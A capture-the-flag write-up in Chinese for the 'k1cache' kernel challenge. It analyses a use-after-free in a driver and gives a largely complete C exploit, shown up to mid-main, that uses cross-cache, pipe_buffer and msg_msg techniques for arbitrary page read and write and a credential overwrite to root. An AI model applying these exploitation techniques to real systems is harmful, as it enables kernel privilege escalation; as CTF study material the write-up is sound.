目录:
- 题面
题目名:k1cache
附件:
- 分析
/ $ uname -a
Linux (none) 6.4.0 #1 SMP PREEMPT_DYNAMIC Mon Sep 18 21:37:46 CST 2023 x86_64 GNU/Linux
#!/bin/sh
# Boot the challenge kernel under QEMU: 256 MiB of RAM, SMEP and SMAP enabled,
# KASLR requested on the kernel command line, serial console only, and no
# reboot after the panic that any oops triggers (oops=panic, panic=1).
#
# Every continued line ends in " \" (note the space): without it the next
# option is glued onto the previous word once the shell joins the lines.
qemu-system-x86_64 \
    -m 256M \
    -kernel ./bzImage \
    -initrd ./rootfs.cpio \
    -monitor /dev/null \
    -append "root=/dev/ram console=ttyS0 oops=panic quiet panic=1 kaslr" \
    -cpu kvm64,+smep,+smap \
    -netdev user,id=t0 -device e1000,netdev=t0,id=nic0 \
    -nographic \
    -no-reboot
用IDA逆向`k1cache.ko`,可以发现内核模块在`kernel_init`中创建了设备`/dev/klcache`以及一个内存池`my_struct`,用来分配32字节的对象,分配标志为`SLAB_ACCOUNT | SLAB_PANIC | SLAB_HWCACHE_ALIGN`[1]。由于`SLAB_ACCOUNT`标志的存在,我们的`my_struct`不会与`kmalloc-32`合并——但是这不意味着`my_struct`不会与任何内存池合并。
/*
 * Module init routine as recovered by the decompiler.
 *
 * Registers the misc device described by `misc` and creates the slab cache
 * named "my_struct" that the add command allocates from. Neither call's
 * result is checked here; the function always returns 0.
 */
int __cdecl kernel_init()
{
_fentry__();
misc_register(&misc);
// name "my_struct", object size 32, third/fifth arguments 0, flags 0x4042000
// (the write-up decodes the flags as SLAB_ACCOUNT | SLAB_PANIC | SLAB_HWCACHE_ALIGN)
cache = (kmem_cache *)kmem_cache_create("my_struct", 32LL, 0LL, 0x4042000LL, 0LL);
return 0;
}

我们可以与`/dev/klcache`交互,在`kernel_ioctl`函数中定义了三种交互方式——show、add与delete。
/*
 * ioctl dispatcher of the device (decompiler output).
 *
 * cmd 64  -> show   : copies 24 bytes of arguments from user space, calls show()
 * cmd 119 -> add    : copies 16 bytes of arguments from user space, calls add_only()
 * cmd 48  -> delete : copies 8 bytes of arguments, kfree()s addrList[index]
 * any other cmd returns 0.
 *
 * Returns -22 when copying the argument block fails and 0 otherwise; the
 * results of show() and add_only() are discarded, so user space never learns
 * the slot index or an allocation failure through the ioctl return value.
 *
 * NOTE(review): v3 is never assigned in this listing; it carries the rdx
 * annotation, so it is presumably the third parameter `arg` - confirm in the
 * disassembly. Likewise `a1` is typed as add_args for all three commands even
 * though each command copies a different number of bytes into it.
 */
__int64 __fastcall kernel_ioctl(file *file, unsigned int cmd, unsigned __int64 arg)
{
__int64 v3; // rdx
__int64 result; // rax
unsigned __int64 size_low; // r13
char *v6; // r12
__int64 v7; // rsi
__int64 v8; // rdx
add_args a1; // [rsp+0h] [rbp-38h] BYREF
unsigned __int64 v10; // [rsp+18h] [rbp-20h]
_fentry__(file, cmd, arg);
v10 = __readgsqword(0x28u);
result = 0LL;
if ( cmd == 64 ) // show
{
if ( !copy_from_user(&a1, v3, 24LL) )
{
// first qword of the copied block (the index per show_args) is passed on;
// show() is declared with a second parameter that this call does not display
show((show_args *)a1.size);
return 0LL;
}
return -22LL;
}
if ( cmd == 119 ) // add
{
v7 = v3;
if ( !copy_from_user(&a1, v3, 16LL) )
{
// passes the address of the second qword (the user data pointer field)
add_only((add_args *)&a1.buf, v7, v8);
return 0LL;
}
return -22LL;
}
if ( cmd != 48 ) // delete
return result;
if ( copy_from_user(&a1, v3, 8LL) )
return -22LL;
// only the low 32 bits of the index are used; the bound is inclusive, so
// 0x1000 passes this check although the UBSAN checks below treat 0xFFF as
// the last valid index
if ( LODWORD(a1.size) <= 0x1000 )
{
size_low = LODWORD(a1.size);
if ( LODWORD(a1.size) > 0xFFF )
_ubsan_handle_out_of_bounds(&off_A40, LODWORD(a1.size));
v6 = addrList[size_low];
if ( v6 )
{
if ( size_low > 0xFFF )
_ubsan_handle_out_of_bounds(&off_A20, size_low);
// the object is freed but addrList[size_low] is not cleared: the slot
// keeps a dangling pointer that show and a second delete can still use
kfree(v6);
}
}
return 0LL;
}
/*
 * add command (decompiler output): allocate one object from `cache`, fill it
 * with 32 bytes read from user space and store it in the first empty slot of
 * addrList.
 *
 * Returns the slot index on success, -12 (as unsigned int) when the allocation
 * fails, -22 when the user copy fails, and 0 when no empty slot is found
 * within 4096 entries.
 *
 * NOTE(review): on the -22 path and on the "list full" path the freshly
 * allocated object is neither stored nor freed in this listing.
 * NOTE(review): `args->size` is the decompiler's typing; the caller passes the
 * address of the buf field, so this is presumably the user data pointer.
 */
__int64 __fastcall add_only(add_args *args)
{
__int64 v1; // rax
__int64 v2; // rbx
__int64 v3; // rax
unsigned int v4; // r12d
__int64 v6; // [rsp-8h] [rbp-230h]
char temp[512]; // [rsp+0h] [rbp-228h] BYREF
unsigned __int64 v8; // [rsp+200h] [rbp-28h]
_fentry__();
v8 = __readgsqword(0x28u);
// allocation flags 0x400CC0 (decoded in the write-up as GFP_KERNEL_ACCOUNT)
v1 = kmem_cache_alloc(cache, 0x400CC0LL);
if ( v1 )
{
v2 = v1;
v3 = copy_from_user(temp, args->size, 32LL);
if ( v3 )
{
return (unsigned int)-22;
}
else
{
// copy the 32 user bytes into the new object, one qword at a time
*(_QWORD *)v2 = *(_QWORD *)temp;
*(_QWORD *)(v2 + 8) = *(_QWORD *)&temp[8];
*(_QWORD *)(v2 + 16) = *(_QWORD *)&temp[16];
*(_QWORD *)(v2 + 24) = *(_QWORD *)&temp[24];
// linear scan for the first NULL slot; v3 is 0 here because the copy succeeded
while ( 1 )
{
v4 = v3;
if ( (unsigned __int64)(int)v3 > 0xFFF )
{
v6 = v3;
_ubsan_handle_out_of_bounds(&off_A80, (int)v3);
v3 = v6;
}
if ( !addrList[v3] )
break;
if ( ++v3 == 4096 )
return 0;
}
if ( (unsigned __int64)(int)v4 > 0xFFF )
_ubsan_handle_out_of_bounds(&off_A60, (int)v4);
addrList[v4] = (char *)v2;
}
}
else
{
return (unsigned int)-12;
}
return v4;
}
/*
 * show command (decompiler output): copy the first 32 bytes of the object in
 * addrList[index] to the user address read from *a2.
 *
 * `args` is not dereferenced; its low 32 bits are used directly as the index.
 * Returns 0xFFFFFFFF when the index is above 0x1000 or the slot is NULL,
 * 0xFFFFFFEA when copy_to_user reports failure, and 0 on success.
 *
 * The slot pointer is used as-is. Because the delete command frees the object
 * without clearing its slot, this reads whatever currently occupies that
 * memory.
 *
 * NOTE(review): a2 presumably points at the buf field of the copied argument
 * block - the call site in kernel_ioctl does not display it; confirm.
 */
__int64 __fastcall show(show_args *args, __int64 *a2)
{
char *v2; // rbx
__int64 v3; // rdi
char buf[4096]; // [rsp+0h] [rbp-1028h] BYREF
unsigned __int64 v6; // [rsp+1000h] [rbp-28h]
_fentry__();
v6 = __readgsqword(0x28u);
memset(buf, 0, sizeof(buf));
// inclusive bound: index 0x1000 is not rejected here
if ( (unsigned int)args > 0x1000 )
return 0xFFFFFFFFLL;
if ( (unsigned int)args > 0xFFF )
_ubsan_handle_out_of_bounds(&off_B00, (unsigned int)args);
v2 = addrList[(unsigned int)args];
if ( !v2 )
return 0xFFFFFFFFLL;
if ( (unsigned int)args > 0xFFFuLL )
{
_ubsan_handle_out_of_bounds(&off_AE0, (unsigned int)args);
_ubsan_handle_out_of_bounds(&off_AC0, (unsigned int)args);
_ubsan_handle_out_of_bounds(&off_AA0, (unsigned int)args);
}
v3 = *a2;
// stage the object's four qwords in the zeroed stack buffer, then copy 32 bytes out
*(_QWORD *)buf = *(_QWORD *)v2;
*(_QWORD *)&buf[8] = *((_QWORD *)v2 + 1);
*(_QWORD *)&buf[16] = *((_QWORD *)v2 + 2);
*(_QWORD *)&buf[24] = *((_QWORD *)v2 + 3);
return ((__int64 (__fastcall *)(__int64, char *, __int64))copy_to_user)(v3, buf, 32LL) != 0 ? 0xFFFFFFEA : 0;
}
/* Argument block of the add ioctl (cmd 119); the handler copies 16 bytes of it. */
struct add_args // sizeof=0x10
{
uint64_t size; // useless
char *buf; // user pointer; add_only copies 32 bytes from it into the new object
};
/* Argument block of the delete ioctl (cmd 48); the handler copies 8 bytes of it. */
struct del_args // sizeof=0x8
{
uint64_t idx; // slot in addrList; the handler only looks at the low 32 bits
};
/* Argument block of the show ioctl (cmd 64); the handler copies 24 bytes of it. */
struct show_args // sizeof=0x18
{
uint64_t idx; // slot in addrList; show() uses the low 32 bits
uint64_t size; // useless
char *buf; // presumably the user destination for the 32 bytes - see show()
};
addrList
中可以存放4096个从my_struct
中分配的对象。

add:从my_struct
中分配并用指定的数据填充对象,分配标志为___GFP_ACCOUNT | ___GFP_DIRECT_RECLAIM | ___GFP_KSWAPD_RECLAIM | ___GFP_IO | ___GFP_FS
,也即GFP_KERNEL_ACCOUNT
[2]。
show:读取addrList
中任何已存在对象的32字节内容。
delete:释放addrList
中任何已存在的对象,不清空指针。
由于delete
功能中有一个非常明显的UAF漏洞,因此我们很容易想到下面的做法。
- 方法一:Cross Cache + pipe_buffer + msg_msg
首先我们要解决的问题是如何让从my_struct
内存池中分配的object、slab被其他内存池分配到,这需要内核在kfree
时进入__unfreeze_partials
[3, mm/slub.c:2581],在kmem_cache_node
的partial slab数达到cache->min_partial
时执行discard_slab
将一个全空的slab释放回Buddy System。一般情况下,在其他内存池从Buddy System中分配slab时,会取回前面释放的slab。由于/dev/klcache
的UAF漏洞,我们仍然可以通过访问addrList
来读取/二次释放这个已经进入其他内存池的slab上的对象。
接下来,分配struct pipe_buffer
结构体,让内存池kmalloc-cg-xx
(xx
待定,CONFIG_MEMCG_KMEM
默认开启)取回前面释放的slab,从而让某些struct pipe_buffer
结构体(称作“pipe buffer victim”)为我们所控制。我们可以用show读取“pipe buffer victim”上前32字节的数据,通过page
与ops
成员的值分别泄露线性映射区的基址page_offset_base
与内核代码映射的基址kernel_base
。
/**
* struct pipe_buffer - a linux kernel pipe buffer
* @page: the page containing the data for the pipe buffer
* @offset: offset of data inside the @page
* @len: length of data inside the @page
* @ops: operations associated with this buffer. See @pipe_buf_operations.
* @flags: pipe buffer flags. See above.
* @private: private data owned by the ops.
**/
struct pipe_buffer {
struct page * page; /* 0 8 */
unsigned int offset; /* 8 4 */
unsigned int len; /* 12 4 */
const struct pipe_buf_operations * ops; /* 16 8 */
unsigned int flags; /* 24 4 */
/* XXX 4 bytes hole, try to pack */
long unsigned int private; /* 32 8 */
/* size: 40, cachelines: 1, members: 6 */
/* sum members: 36, holes: 1, sum holes: 4 */
/* last cacheline: 40 bytes */
};
在此之后,通过释放addrList
上残留的指针,我们可以将“pipe buffer victim”释放回kmalloc-cg-xx
。由于freelist的LIFO单链表结构,如果再从该内存池中取出一个对象,并且刚刚被释放的“pipe buffer victim”所在slab为per_cpu_ptr(kmem_cache->cpu_slab, cpu)->slab
,那么取出的对象恰好为“pipe buffer victim”。对这个取出的对象进行读写即可控制“pipe buffer victim”的内容。
现在考虑struct msg_msg
结构体。它是一条DATALEN_MSG
字节以内IPC消息的头部,IPC消息的长度以及除去头部以外的内容都是可控的。通过pipe_fcntl
设置管道的缓冲大小时,内核通过kcalloc
分配连续的nr_slots = size >> PAGE_SHIFT
(2的幂次)个struct pipe_buffer
结构体[4, fs/pipe.c:1239,1258]。考虑nr_slots = 4
(kmalloc-cg-192
),使用msgsnd
系统调用发送192 - sizeof(struct msg_msg)
字节的IPC消息,我们刚好可以完整地控制第三个与第四个struct pipe_buffer
。为了平衡消息队列中消息的数量,我们还需要msgrcv
系统调用来脱链与释放一条消息。
/* one msg_msg structure for each message */
struct msg_msg {
struct list_head m_list; /* 0 16 */
long int m_type; /* 16 8 */
size_t m_ts; /* 24 8 */
struct msg_msgseg * next; /* 32 8 */
void * security; /* 40 8 */
/* size: 48, cachelines: 1, members: 5 */
/* last cacheline: 48 bytes */
};
int pipe_resize_ring(struct pipe_inode_info *pipe, unsigned int nr_slots)
{
struct pipe_buffer *bufs;
unsigned int head, tail, mask, n;
bufs = kcalloc(nr_slots, sizeof(*bufs),
GFP_KERNEL_ACCOUNT | __GFP_NOWARN);
// ...
}
为了跳过前两个struct pipe_buffer
,我们可以对管道写入然后读取两页数据让pipe_inode_info->head
与pipe_inode_info->tail
同时指向第三个缓冲,通过IPC消息篡改第三个缓冲,再对管道读写便可实现对任意页的读写。
最后,我们尝试修改当前进程的task_struct->cred
与task_struct->real_cred
为init_cred
。为了方便定位,通过prctl
系统调用修改task_struct->comm
,直接搜索pipe_buffer_victim->page
附近的页,查找与task_struct->comm
匹配的字符串定位task_struct
,最后完成篡改即可将当前进程提权为root权限。
struct task_struct {
// ...
const struct cred * real_cred; /* 2896 8 */
const struct cred * cred; /* 2904 8 */
struct key * cached_requested_key; /* 2912 8 */
char comm[16]; /* 2920 16 */
// ...
/* size: 13440, cachelines: 210, members: 240 */
// ...
};
FINAL EXPLOIT
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdint.h>
#include <sched.h>
#include <errno.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/msg.h>
#include <sys/ipc.h>
#include <sys/socket.h>
#include <sys/prctl.h>
#include <sys/shm.h>
#include <sys/xattr.h>
#include <sys/types.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#define CMD_ADD 119
#define CMD_DEL 48
#define CMD_SHOW 64
struct add_args // sizeof=0x10
{
uint64_t size;
char *buf;
};
struct del_args // sizeof=0x8
{
uint64_t idx;
};
struct show_args // sizeof=0x18
{
uint64_t idx;
uint64_t size;
char *buf;
};
/* to run the exp on the specific core only */
// void bind_cpu(int core)
// {
// cpu_set_t cpu_set;
// CPU_ZERO(&cpu_set);
// CPU_SET(core, &cpu_set);
// sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
// printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
// }
#define OBJECT_SIZE 32
#define MODPROBE_PATH 0xffffffff831d8ce0
int dev_fd;
#define KERNEL_BASE_0 (0xffffffff81000000ULL)
#define ANON_PIPE_OPS_OFFSET (0xffffffff82246ec0ULL - KERNEL_BASE_0)
#define INIT_CRED_OFFSET (0xffffffff8308c620ULL - KERNEL_BASE_0)
#define PAGE_OFFSET_BASE_0 (0xffff888000000000ULL)
size_t kernel_base = 0xffffffff81000000ULL;
size_t page_offset_base = 0xffff888000000000ULL, vmemmap_base = 0xffffea0000000000ULL;
/* msgrcv options */
#define MSG_NOERROR 010000 /* no error if message is too big */
#define MSG_EXCEPT 020000 /* recv any msg except of specified type.*/
#define MSG_COPY 040000 /* copy (not remove) all queue messages */
struct page;
struct pipe_inode_info;
struct pipe_buf_operations;
struct msg_msgseg {
struct msg_msgseg * next; /* 0 8 */
/* size: 8, cachelines: 1, members: 1 */
/* last cacheline: 8 bytes */
};
struct list_head {
struct list_head * next; /* 0 8 */
struct list_head * prev; /* 8 8 */
/* size: 16, cachelines: 1, members: 2 */
/* last cacheline: 16 bytes */
};
struct msg_msg {
struct list_head m_list; /* 0 16 */
long int m_type; /* 16 8 */
size_t m_ts; /* 24 8 */
struct msg_msgseg * next; /* 32 8 */
void * security; /* 40 8 */
/* size: 48, cachelines: 1, members: 5 */
/* last cacheline: 48 bytes */
};
/* read start from len to offset, write start from offset */
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};
struct pipe_buf_operations {
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);
int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};
struct seq_file;
struct seq_operations {
void * (*start) (struct seq_file *m, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
};
/*
 * Report a fatal error and terminate the program.
 *
 * msg       - description of the step that failed.
 * use_errno - non-zero: report through perror() so the errno text is appended;
 *             zero: print the message alone with puts().
 *
 * Blocks on getchar() before exiting so the message stays on screen, then
 * exits with EXIT_FAILURE. Does not return.
 */
void err_exit(char *msg, int use_errno)
{
    /* Capture errno first: the formatting call below is allowed to modify it. */
    const int saved_errno = errno;
    char buf[0x600];

    /* Bounded formatting: an over-long msg is truncated instead of overflowing buf. */
    snprintf(buf, sizeof buf, "[\x1b[31;1mFATAL\x1b[0m] %s", msg);
    if (use_errno) {
        errno = saved_errno;
        perror(buf);
    } else {
        puts(buf);
    }
    getchar();
    exit(EXIT_FAILURE);
}
/*
 * Create a new private System V message queue.
 *
 * Returns the queue identifier. A failing msgget() is reported through
 * err_exit(), which terminates the process.
 */
int get_msg_queue(void)
{
    const int msqid = msgget(IPC_PRIVATE, IPC_CREAT | 0666);

    if (msqid >= 0)
        return msqid;

    err_exit("get_msg_queue", 1);
    return msqid;
}
/*
 * Receive (and remove) one message of type `msgtyp` from queue `msqid` into
 * `msgp`, accepting at most `msgsz` payload bytes. Blocking call (flags 0).
 * Returns the msgrcv() result narrowed to int.
 */
int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    const int no_flags = 0;

    return msgrcv(msqid, msgp, msgsz, msgtyp, no_flags);
}
/**
 * Send one message to queue `msqid`.
 *
 * `msgp` must point to a `struct msgbuf`-shaped object whose payload already
 * sits in `mtext`; this function stamps `msgtyp` into its `mtype` field and
 * sends `msgsz` payload bytes with flags 0. Returns the msgsnd() result.
 */
int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    struct msgbuf *outgoing = (struct msgbuf*)msgp;

    outgoing->mtype = msgtyp;
    return msgsnd(msqid, msgp, msgsz, 0);
}
/*
 * Copy a message out of queue `msqid` without removing it.
 *
 * With MSG_COPY the `msgtyp` argument selects the position of the message on
 * the queue rather than its type. The call never blocks (IPC_NOWAIT) and
 * truncates over-long messages instead of failing (MSG_NOERROR).
 */
int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    const int peek_flags = MSG_COPY | IPC_NOWAIT | MSG_NOERROR;

    return msgrcv(msqid, msgp, msgsz, msgtyp, peek_flags);
}
/*
 * Fill every field of the user-space `struct msg_msg` mirror pointed to by
 * `msg` with the supplied values. Purely a field-by-field store; nothing is
 * validated and nothing is returned.
 */
void build_msg(struct msg_msg *msg, void *m_list_next, void *m_list_prev,
               uint64_t m_type, uint64_t m_ts, void *next, void *security)
{
    /* list linkage */
    msg->m_list.next = m_list_next;
    msg->m_list.prev = m_list_prev;

    /* header scalars */
    msg->m_ts = m_ts;
    msg->m_type = m_type;

    /* trailing pointers */
    msg->security = security;
    msg->next = next;
}
struct msgbuf_64 {
long mtype;
union {
char mtext[64];
size_t mqword[8];
};
};
struct msgbuf_192 {
long mtype;
union {
char mtext[192];
size_t mqword[192/8];
};
};
int dev_add(void* buf) {
struct add_args req = { 0x20, buf };
return ioctl(dev_fd, CMD_ADD, &req);
}
int dev_delete(int index) {
struct del_args req = { index };
return ioctl(dev_fd, CMD_DEL, &req);
}
int dev_show(int index, void* buf) {
struct show_args req = { index, 0x20, buf };
return ioctl(dev_fd, CMD_SHOW, &req);
}
/*
 * Pretty-print OBJECT_SIZE bytes starting at `buf`, one 8-byte word per line:
 * byte offset, the word in hex, and its bytes as printable ASCII ('.' for
 * anything outside 32..126). A blank line terminates the dump.
 *
 * Each word is fetched with memcpy, so `buf` may have any alignment; callers
 * in this file pass plain char arrays.
 */
void dump(void *buf) {
    const unsigned char *bytes = buf;
    const unsigned int words = (OBJECT_SIZE + 7) >> 3;

    for (unsigned int i = 0; i < words; ++i) {
        uint64_t word;
        char ascii[9];

        memcpy(&word, bytes + (size_t)i * 8, sizeof word);
        for (int j = 0; j < 8; ++j) {
            uint8_t ch = (uint8_t)(word >> j*8);
            ascii[j] = (char)(32 <= ch && ch <= 126 ? ch : '.');
        }
        ascii[8] = 0;
        printf("\x1b[34;1m0x%08x:\x1b[0m \x1b[33;1m0x%016llx\x1b[0m /* \x1b[90;1m%s\x1b[0m */\n", i << 3, (unsigned long long)word, ascii);
    }
    printf("\n");
}
/*
 * Pretty-print `n` bytes starting at `buf`, one 8-byte word per line: byte
 * offset, the word in hex, and its bytes as printable ASCII ('.' for anything
 * outside 32..126). A blank line terminates the dump.
 *
 * When `n` is not a multiple of 8 the last word is padded with zero bytes;
 * nothing beyond buf[n-1] is read. Words are fetched with memcpy, so `buf`
 * may have any alignment.
 */
void dump_n(void *buf, size_t n) {
    const unsigned char *bytes = buf;

    for (size_t off = 0; off < n; off += 8) {
        const size_t remaining = n - off;
        const size_t take = remaining < 8 ? remaining : 8;
        uint64_t word = 0;
        char ascii[9];

        /* Copy only the bytes that exist; the rest of the word stays zero. */
        memcpy(&word, bytes + off, take);
        for (int j = 0; j < 8; ++j) {
            uint8_t ch = (uint8_t)(word >> j*8);
            ascii[j] = (char)(32 <= ch && ch <= 126 ? ch : '.');
        }
        ascii[8] = 0;
        printf("\x1b[34;1m0x%08x:\x1b[0m \x1b[33;1m0x%016llx\x1b[0m /* \x1b[90;1m%s\x1b[0m */\n", (unsigned int)off, (unsigned long long)word, ascii);
    }
    printf("\n");
}
/*
 * Read slot `idx` through the show ioctl and hex-dump the 32 bytes obtained.
 *
 * Returns the status reported by dev_show(). The buffer is zero-filled first,
 * so a slot the driver refuses to show is dumped as zeros rather than as
 * leftover stack contents. The driver's ioctl handler returns 0 even when
 * show() bails out, so the status alone cannot tell the two cases apart.
 *
 * NOTE(review): the index line is printed when VERBOSE is NOT defined; that
 * looks inverted but is kept as found - confirm the intent.
 */
long show_and_dump(size_t idx) {
#ifndef VERBOSE
    printf("Index: \x1b[32;1m%zu\x1b[0m\n", idx);
#endif
    char buf[OBJECT_SIZE] = {0};
    long status = dev_show(idx, &buf);
    dump(&buf);
    return status;
}
#define NR_PIPES 400
#define NR_SPRAY 4000
#define NR_MSGSND 300
int victim_pipe_i;
int victim_i;
int victim_i_2;
int venomous_msqid;
int pipe_fds[NR_PIPES][2];
size_t orig_ops;
/*
 * Write `nbytes` from `buf` into the page described by `page` at `offset`,
 * by rewriting a pipe_buffer through the message queue and then writing to
 * the victim pipe.
 *
 * Steps: take the type-0x41 message back off venomous_msqid, build a fake
 * pipe_buffer inside a zeroed payload, send the message again, then write()
 * to pipe_fds[victim_pipe_i]. Exits via err_exit() if either queue operation
 * fails; the result of the final write() is not checked.
 */
void arb_write(void *page, unsigned int offset, void *buf, unsigned int nbytes) {
struct msgbuf_192 dummy_buf;
if (read_msg(venomous_msqid, (struct msgbuf*)&dummy_buf, 192-sizeof(struct msg_msg), 0x41) < 0) {
err_exit("read_msg", 1);
}
memset(dummy_buf.mtext, 0, sizeof(dummy_buf.mtext));
// payload offset 32 + 48-byte msg_msg header = byte 80 of the object, i.e. the
// third 40-byte pipe_buffer of the ring
struct pipe_buffer *fake_pipe = (struct pipe_buffer*)&dummy_buf.mtext[32];
fake_pipe->page = page;
fake_pipe->offset = offset;
// len 0: no data pending in this buffer
fake_pipe->len = 0;
fake_pipe->ops = (void*)orig_ops;
// presumably PIPE_BUF_FLAG_CAN_MERGE so the write lands in this page - confirm
fake_pipe->flags = 0x10;
if (write_msg(venomous_msqid, (struct msgbuf*)&dummy_buf, 192-sizeof(struct msg_msg), 0x41) < 0) {
err_exit("write_msg", 1);
}
write(pipe_fds[victim_pipe_i][1], buf, nbytes);
}
/*
 * Read `nbytes` into `buf` from the page described by `page`, starting at
 * `offset`, by rewriting a pipe_buffer through the message queue and then
 * reading from the victim pipe.
 *
 * Steps: take the type-0x41 message back off venomous_msqid, build a fake
 * pipe_buffer inside a zeroed payload, send the message again, then read()
 * from pipe_fds[victim_pipe_i]. Exits via err_exit() if either queue
 * operation fails; the result of the final read() is not checked.
 */
void arb_read(void *page, unsigned int offset, void *buf, unsigned int nbytes) {
struct msgbuf_192 dummy_buf;
if (read_msg(venomous_msqid, (struct msgbuf*)&dummy_buf, 192-sizeof(struct msg_msg), 0x41) < 0) {
err_exit("read_msg", 1);
}
memset(dummy_buf.mtext, 0, sizeof(dummy_buf.mtext));
// payload offset 32 + 48-byte msg_msg header = byte 80 of the object, i.e. the
// third 40-byte pipe_buffer of the ring
struct pipe_buffer *fake_pipe = (struct pipe_buffer*)&dummy_buf.mtext[32];
fake_pipe->page = page;
fake_pipe->offset = offset;
// advertise 0x2000 bytes of pending data so the read is served from this buffer
fake_pipe->len = 0x2000;
fake_pipe->ops = (void*)orig_ops;
fake_pipe->flags = 0;
if (write_msg(venomous_msqid, (struct msgbuf*)&dummy_buf, 192-sizeof(struct msg_msg), 0x41) < 0) {
err_exit("write_msg", 1);
}
read(pipe_fds[victim_pipe_i][0], buf, nbytes);
}
/*
 * Entry point of the first proof of concept (method one in the write-up).
 *
 * Stages, in order: create the pipes, fill and free driver slots, resize the
 * pipes, locate a dangling slot that shows pipe_buffer contents, derive the
 * base addresses, swap the freed object for a message, then scan pages for
 * the renamed task and rewrite its credential pointers.
 *
 * The statement order is part of the technique; comments below only describe
 * what each stage does.
 */
int main(){
dev_fd = open("/dev/klcache", O_RDWR);
if (dev_fd < 0) {
err_exit("Error opening /dev/klcache", 1);
}
size_t tmpbuf[4] = {0,};
char pagebuf2[0x2000] = {0,};
// Stage 1: open NR_PIPES pipes; pipe i holds i+1 bytes so its buffer length
// field identifies it later.
for (int i=0; i<NR_PIPES; ++i) {
if (pipe(pipe_fds[i]) < 0) {
err_exit("pipe", 1);
}
write(pipe_fds[i][1], pagebuf2, i+1);
}
// Stage 2: create NR_SPRAY driver objects, then delete them all. The driver
// keeps the freed pointers in its table.
for (int i=0; i<NR_SPRAY; ++i) {
if (dev_add(&tmpbuf) < 0) {
err_exit("Failed to add.", 0);
}
}
for (int i=0; i<NR_SPRAY; ++i) {
dev_delete(i);
}
// Stage 3: resize every pipe to 0x4000 bytes (4 slots), which reallocates
// its pipe_buffer array.
for (int i=0; i<NR_PIPES; ++i) {
if (fcntl(pipe_fds[i][0], F_SETPIPE_SZ, 0x4000) < 0) {
err_exit("Failed to realloc pipe_buffer", 1);
}
}
// Stage 4: find a slot whose qword 0 and qword 2 look like a page pointer and
// an ops pointer, i.e. the start of a pipe_buffer.
size_t orig_buf[4];
for (victim_i=0; victim_i<NR_SPRAY; ++victim_i) {
dev_show(victim_i, &orig_buf);
if (orig_buf[0] > PAGE_OFFSET_BASE_0 && orig_buf[2] > KERNEL_BASE_0) {
goto out;
}
}
err_exit("Exhausted.", 0);
out:
show_and_dump(victim_i);
// Stage 5: push 0x2000 bytes through every pipe and read them back, which
// moves each ring past its first two buffers.
for (int i=0; i<NR_PIPES; ++i) {
write(pipe_fds[i][1], &pagebuf2, 0x1fff-i);
write(pipe_fds[i][1], pagebuf2, i+1);
read(pipe_fds[i][0], &pagebuf2, 0x2000);
}
show_and_dump(victim_i);
// Find a second slot whose bytes 16..31 match the first victim's offset/len
// qword (only used for the diagnostic dumps below).
size_t orig_buf_2[4];
for (victim_i_2=0; victim_i_2<NR_SPRAY; ++victim_i_2) {
dev_show(victim_i_2, &orig_buf_2);
if (orig_buf_2[2] > PAGE_OFFSET_BASE_0 && orig_buf_2[3] == orig_buf[1]) {
goto out_;
}
}
err_exit("Exhausted _.", 0);
out_:
show_and_dump(victim_i_2);
// Stage 6: derive base addresses from the leaked page and ops pointers.
page_offset_base = orig_buf[0] & ~0xFFFFFFULL;
kernel_base = orig_buf[2] - ANON_PIPE_OPS_OFFSET;
printf("[\x1b[32;1m+\x1b[0m] page_offset_base = 0x%016lx\n", page_offset_base);
printf("[\x1b[32;1m+\x1b[0m] kernel_base = 0x%016lx\n", kernel_base);
// the high half of qword 1 is the buffer length, which stage 1 set to i+1
victim_pipe_i = (int)(orig_buf[1] >> 32) - 1ULL;
printf("[\x1b[32;1m+\x1b[0m] victim_pipe_i = %d\n", victim_pipe_i);
goto out2;
out2:
// Stage 7: free the victim object through the driver and send messages until
// one of them occupies it (detected by qword 1 turning into a pointer).
venomous_msqid = get_msg_queue();
struct msgbuf_192 venomous_msgbuf;
// NOTE(review): only mqword[4] is initialised; the rest of the payload is
// whatever was on the stack.
venomous_msgbuf.mqword[4] = 0x1919810;
dev_delete(victim_i);
size_t tampered_victim_buf[4];
for (int i=0; i<NR_MSGSND; ++i) {
if (write_msg(venomous_msqid, (struct msgbuf*)&venomous_msgbuf, 192-sizeof(struct msg_msg), 0x41) < 0) {
err_exit("write_msg", 1);
}
dev_show(victim_i, &tampered_victim_buf);
if (tampered_victim_buf[1] > PAGE_OFFSET_BASE_0) {
printf("[\x1b[34;1m*\x1b[0m] %d\n", i);
goto out3;
}
}
err_exit("Exhausted 3.", 0);
out3:
show_and_dump(victim_i);
show_and_dump(victim_i_2);
orig_ops = orig_buf[2];
// Stage 8: rename the process so its task_struct can be recognised, then scan
// struct page entries (0x40 apart) around the leaked one.
if (prctl(PR_SET_NAME, "astra_kernel") < 0) {
err_exit("PR_SET_NAME", 1);
};
size_t arb_read_buf[512] = {0,};
size_t curr_page;
int i;
size_t *task_comm;
for (i = 0, curr_page = orig_buf[0]+0x4000ULL*0x40ULL; curr_page >= orig_buf[0]-0x10000ULL*0x40ULL; ++i, curr_page -= 0x40) {
if (i % 100 == 0) {
printf("[\x1b[34;1m*\x1b[0m] Pages scanned: %d\n", i);
}
arb_read((void*)curr_page, 0, &arb_read_buf, 0xffe);
task_comm = memmem(&arb_read_buf, 0xffe, "astra_kernel", 12);
// NOTE(review): the match is used as a size_t pointer without an alignment
// check, and indices -2/-3 reach before arb_read_buf when the match lies in
// the first 24 bytes of the page.
if (task_comm && task_comm[-2] > PAGE_OFFSET_BASE_0 && task_comm[-3] > PAGE_OFFSET_BASE_0) {
goto out4;
}
}
